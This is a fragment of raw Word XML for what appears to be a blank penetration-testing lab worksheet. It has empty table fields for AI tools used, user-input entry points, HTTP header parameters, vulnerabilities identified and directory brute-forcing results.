                <w:numId w:val="3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B9DDEBD" w14:textId="77777777" w:rsidR="00803392" w:rsidRPr="00803392" w:rsidRDefault="00803392" w:rsidP="0080339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733B7" w:rsidRPr="00803392" w14:paraId="39F956D0" w14:textId="77777777" w:rsidTr="00A7152A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4ADED58D" w14:textId="180A97A2" w:rsidR="008733B7" w:rsidRPr="00803392" w:rsidRDefault="008733B7" w:rsidP="00A7152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A7B6B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AI Tools Used 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6967D015" w14:textId="7541DAC9" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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C030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[*ShellGPT, </w:t>
            </w:r>
            <w:r w:rsidR="00FD4B8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Pentest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GPT, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EA6923D" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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1B36367" w14:textId="77777777" w:rsidR="008733B7" w:rsidRPr="00803392" w:rsidRDefault="008733B7" w:rsidP="008733B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733B7" w:rsidRPr="00803392" w14:paraId="714292A2" w14:textId="77777777" w:rsidTr="00A7152A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9736072" w14:textId="220050AE" w:rsidR="008733B7" w:rsidRPr="00BA7B6B" w:rsidRDefault="008733B7" w:rsidP="00A7152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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation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0123F88F" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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C033527" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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A47D852" w14:textId="77777777" w:rsidR="008733B7" w:rsidRPr="002C030C" w:rsidRDefault="008733B7" w:rsidP="008733B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8733B7" w:rsidRPr="00803392" w14:paraId="7CE3AC91" w14:textId="77777777" w:rsidTr="00A7152A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DAB7363" w14:textId="45601EFA" w:rsidR="008733B7" w:rsidRPr="004B6A7F" w:rsidRDefault="008733B7" w:rsidP="00A7152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3422B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Extracted Information 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139130AB" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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404CD6A" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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7492551" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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C2944AF" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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57677EE" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7" w:rsidP="008733B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</w:tbl>
    <w:p w14:paraId="3827979D" w14:textId="77777777" w:rsidR="00C70666" w:rsidRPr="00A51A96" w:rsidRDefault="00C70666" w:rsidP="00C70666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bookmarkStart w:id="4" w:name="_Hlk189065622"/>
      <w:r w:rsidRPr="00A51A96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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0666" w14:paraId="56F657A3" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61F03EDF" w14:textId="77777777" w:rsidR="00C70666" w:rsidRDefault="00C70666" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58A8CCDF" w14:textId="77777777" w:rsidR="00C70666" w:rsidRDefault="00C70666" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EC87B60" w14:textId="77777777" w:rsidR="00C70666" w:rsidRDefault="00C70666" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C31EF16" w14:textId="77777777" w:rsidR="00C70666" w:rsidRDefault="00C70666" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5940DC9C" w14:textId="77777777" w:rsidR="00C70666" w:rsidRDefault="00C70666" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="738032C6" w14:textId="77777777" w:rsidR="00062066" w:rsidRDefault="00062066" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="716C6AF1" w14:textId="77777777" w:rsidR="00062066" w:rsidRDefault="00062066" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32ADF755" w14:textId="77777777" w:rsidR="00062066" w:rsidRDefault="00062066" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="4"/>
    </w:tbl>
    <w:p w14:paraId="6A2CD135" w14:textId="77777777" w:rsidR="008733B7" w:rsidRDefault="008733B7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062066" w:rsidRPr="00A51A96" w14:paraId="0899F331" w14:textId="77777777" w:rsidTr="009F2288">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="205F71B5" w14:textId="1B071E6B" w:rsidR="00062066" w:rsidRPr="003C713F" w:rsidRDefault="00062066" w:rsidP="0085194C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2.3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DC7496" w:rsidRPr="00DC7496">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Identify Entry Points for User Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="249F8A2D" w14:textId="77777777" w:rsidR="00062066" w:rsidRPr="00C87317" w:rsidRDefault="00062066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65"/>
        <w:gridCol w:w="6795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00843567" w:rsidRPr="00843567" w14:paraId="5A6EC232" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1841C983" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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43567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795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EDC7484" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="0084356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43567" w:rsidRPr="00843567" w14:paraId="10DFA6D6" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="661CD4A0" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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43567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795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B15DD81" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="0084356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43567" w:rsidRPr="00843567" w14:paraId="73EC41CE" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F1014B7" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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43567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795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F79A6E" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="0084356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43567" w:rsidRPr="00843567" w14:paraId="57EBE509" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49A55F7E" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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84356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Determined User Input fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684D2EBA" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567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4067A1F" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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787EE53" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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4CEB1C1" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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8861D85" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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C273A15" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="0084356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43567" w:rsidRPr="00843567" w14:paraId="5D918AB4" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:trHeight w:val="1250"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FBE66F6" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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43567">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>URL Queries Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="168092EF" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="0084356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43567" w:rsidRPr="00843567" w14:paraId="2D8CF856" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3382F7DA" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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843567"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 HTTP Header Parameters that can be Processed a</w:t>
            </w:r>
            <w:r w:rsidRPr="00843567">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>s User Inputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="426B4594" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39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859215F" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39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E6214D9" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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3C6B2C9" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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8C57680" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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A5FF027" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567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43567" w:rsidRPr="00843567" w14:paraId="00FA9211" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:trHeight w:val="1646"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="141FD1DD" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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43567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 xml:space="preserve">URL Encoding and Encryption Mechanism Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23C2BDDD" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="0084356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D7CED" w:rsidRPr="00843567" w14:paraId="6C465BB1" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:trHeight w:val="1646"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56F36F22" w14:textId="059E3108" w:rsidR="007D7CED" w:rsidRPr="00843567" w:rsidRDefault="00C55934" w:rsidP="00C8731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Vulnerabilities Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F81FD6" w14:textId="77777777" w:rsidR="007D7CED" w:rsidRDefault="00ED5DE1" w:rsidP="0084356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C0221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[*URL Query Vulnerability, GET &amp; POST Method Vulnerability,</w:t>
            </w:r>
            <w:r w:rsidR="00C02217" w:rsidRPr="00C02217">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C02217" w:rsidRPr="00C0221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Cookie Manipulation Vulnerability, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00C0221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757FAD6" w14:textId="77777777" w:rsidR="00C02217" w:rsidRDefault="00C02217" w:rsidP="0084356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7685BD9" w14:textId="77777777" w:rsidR="00C02217" w:rsidRDefault="00C02217" w:rsidP="0084356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5C5C767" w14:textId="77777777" w:rsidR="00C02217" w:rsidRDefault="00C02217" w:rsidP="0084356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3FB5706" w14:textId="4F394604" w:rsidR="00C02217" w:rsidRPr="00C02217" w:rsidRDefault="00C02217" w:rsidP="0084356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843567" w:rsidRPr="00843567" w14:paraId="336E3616" w14:textId="77777777" w:rsidTr="00C87317">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2565" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27C2544B" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00C8731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43567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795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65288AFA" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38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F6873F8" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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535DCD7" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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E660596" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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AF13164" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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200CABB" w14:textId="77777777" w:rsidR="00843567" w:rsidRPr="00843567" w:rsidRDefault="00843567" w:rsidP="0084356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5EE6B8CC" w14:textId="77777777" w:rsidR="00091101" w:rsidRPr="00A51A96" w:rsidRDefault="00091101" w:rsidP="00091101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101" w14:paraId="466671F4" w14:textId="77777777" w:rsidTr="00450451">
        <w:trPr>
          <w:trHeight w:val="5498"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="544C405A" w14:textId="77777777" w:rsidR="00091101" w:rsidRDefault="00091101" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C4D9929" w14:textId="77777777" w:rsidR="00091101" w:rsidRDefault="00091101" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17F972EB" w14:textId="77777777" w:rsidR="00091101" w:rsidRDefault="00091101" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57BA5D9D" w14:textId="77777777" w:rsidR="00091101" w:rsidRDefault="00091101" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64DBDCFD" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E9A87C4" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F3FA0B2" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32E2B4AF" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1EB95108" w14:textId="77777777" w:rsidR="00091101" w:rsidRDefault="00091101" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14546053" w14:textId="77777777" w:rsidR="00DC7496" w:rsidRDefault="00DC7496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673C3B" w:rsidRPr="00A51A96" w14:paraId="3075CDCF" w14:textId="77777777" w:rsidTr="001B083E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="77270EF5" w14:textId="096E08FE" w:rsidR="00673C3B" w:rsidRPr="003C713F" w:rsidRDefault="00673C3B" w:rsidP="0085194C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2.4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505C3E" w:rsidRPr="00505C3E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Directory Brute Forcing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E5FA685" w14:textId="77777777" w:rsidR="00091101" w:rsidRPr="00E23911" w:rsidRDefault="00091101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1749A3" w:rsidRPr="001749A3" w14:paraId="0C89C5EE" w14:textId="77777777" w:rsidTr="0041645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9674AC3" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="0041645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749A3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5AABD150" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A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749A3" w:rsidRPr="001749A3" w14:paraId="5A5BFC96" w14:textId="77777777" w:rsidTr="0041645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C7AE31A" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="0041645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749A3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3167134B" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A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749A3" w:rsidRPr="001749A3" w14:paraId="2AA61DFA" w14:textId="77777777" w:rsidTr="0041645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5F5E641" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="0041645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749A3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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="158F0456" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A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749A3" w:rsidRPr="001749A3" w14:paraId="50C333ED" w14:textId="77777777" w:rsidTr="00416458">
        <w:trPr>
          <w:trHeight w:val="2015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1D8C547" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="0041645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749A3"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 Directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34151D3E" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40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90FB54E" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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AAB4CBF" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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8AC2C4D" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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02C7BEA" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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59A6FE3" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A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749A3" w:rsidRPr="001749A3" w14:paraId="20F9B2A4" w14:textId="77777777" w:rsidTr="00416458">
        <w:trPr>
          <w:trHeight w:val="2015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BABF8DE" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="0041645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749A3"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 Hidden Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F773A76" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41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C0A843A" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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A7F8A3A" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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9E68ECA" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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D00AC4F" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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DDF0CC4" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A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5588E" w:rsidRPr="001749A3" w14:paraId="15E9B00D" w14:textId="77777777" w:rsidTr="00416458">
        <w:trPr>
          <w:trHeight w:val="1853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6E1DDAD" w14:textId="532442A1" w:rsidR="0015588E" w:rsidRPr="001749A3" w:rsidRDefault="0015588E" w:rsidP="0041645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5588E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32021B9A" w14:textId="77777777" w:rsidR="0015588E" w:rsidRPr="001749A3" w:rsidRDefault="0015588E" w:rsidP="001558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749A3" w:rsidRPr="001749A3" w14:paraId="140BB455" w14:textId="77777777" w:rsidTr="0041645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64705BC" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="0041645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749A3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0DB3D411" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="00B84222">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42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6DB50B0" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="00B84222">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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6B358D6" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="00B84222">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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963EEF9" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="00B84222">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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9D38924" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="00B84222">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
